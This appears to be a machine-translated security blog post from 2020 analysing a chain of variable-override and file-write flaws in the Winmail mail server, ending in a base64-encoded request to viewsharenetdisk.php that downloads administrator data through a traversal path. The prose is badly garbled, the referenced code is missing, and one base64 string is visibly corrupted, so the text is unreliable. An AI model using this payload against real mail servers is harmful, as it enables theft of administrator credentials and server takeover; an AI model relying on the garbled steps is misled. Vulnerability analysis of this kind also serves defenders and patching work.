Aquaboutic | Focus Security Research | Vulnerability Exploit | POC


getshell analysis of winmail database coverage (with poc)

Posted by mitry at 2020-03-23

All global variables in winmail are defined in. / Inc / config.php. If there is a variable coverage vulnerability, any global variable can be covered.

Call the index.php file when WAP. PHP? Dest = index

Observe index.php (located at.. / WAP / index. PHP)

In this code, controllable variables include $logoimage $f domain, $logoimage, file suffix and file content, and $f domain, file name

This is the result of a vulnerability in writing to a specific suffix file. But only limited to JPG GIF PNG, etc. You don't get permission.

In viewsharenetdisk.php

There is a variable override vulnerability in parse \. $f can be overridden. Base64 encryption is required, and subsequent variables can be controlled at will without reassignment

Follow the process. You need to verify $chknum and $itemcode. These two variables can be overridden, but the MD5 value of userinfo is unknown.

Viewing userinfo on the Internet


In SQL, new SQLite brings in a variable

Here $file is passed in by mailuser? Dbfile. Mailuser? Dbfile is defined globally and can be overridden at this time.

Vmmljozedfdmjxrnbisfz6wlhjdphst0maxrlbwnvzgu9ytmwzk4odjhmdk1m2rm2e4ndblottvkzjbhndg3njimy2hrc3v tptm1oge2otjlodk4owq0ndvhzgq2yju1ognjyjju 1 Y2UxJnN0YXJ0PTEmbmV0ZGlza19zaGFyZV9leHBpcmU9MTQ3OTg2NTY5MzE=

Download administrator data

viewsharenetdisk.php?userid=adminf=bWFpbHVzZXJfZGJmaWxlPS5cY3VzdG9tZXJcZmdoZmdmZ2hmMV9sb2dvLmpwZyZ1c2VyY29kZT1kMWRmZDg4YTgwZTVjOWU4OTU2ODZhM2ZiYmUwMDI3OSZvcHQ9ZG93bmxvYWQmZmlsZW5hbWU9WEM0dUx5NHVMMlJoZEdFdllXUnRhVzUxYzJWeUxtTm1adz09Jml0ZW1jb2RlPTZhNzgzMTMzMjE5OGU0ZDU1NmQyYWY5ZDYxZWI4ZmIwJmNoa3N1bT1kYWI4YTQwN2JhMGFjOGRhYThhZjQyN2Q2NDU0OTQzZiZzdGFydD 0xJm5ldGRpc2tfc2hhcmVfZXhwaXJlPTE0Nzk4NjU2OTMx

Tags: None